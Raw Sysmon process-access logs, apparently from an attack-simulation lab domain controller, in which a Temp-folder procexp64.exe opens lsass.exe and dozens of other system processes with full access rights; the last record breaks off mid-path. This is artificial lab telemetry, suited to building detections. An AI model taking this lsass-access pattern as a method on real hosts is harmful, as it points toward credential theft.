10341000x8000000000000000785165Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785164Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785163Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785162Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785161Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785160Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785159Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785158Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785157Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785156Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785155Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785154Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785153Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785152Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785275Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785274Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785273Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785272Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785271Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785270Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785269Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785268Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785267Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785266Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785265Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785264Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785263Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785262Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785261Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785260Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785259Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785258Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785257Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785256Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785255Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785254Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785253Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785252Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program 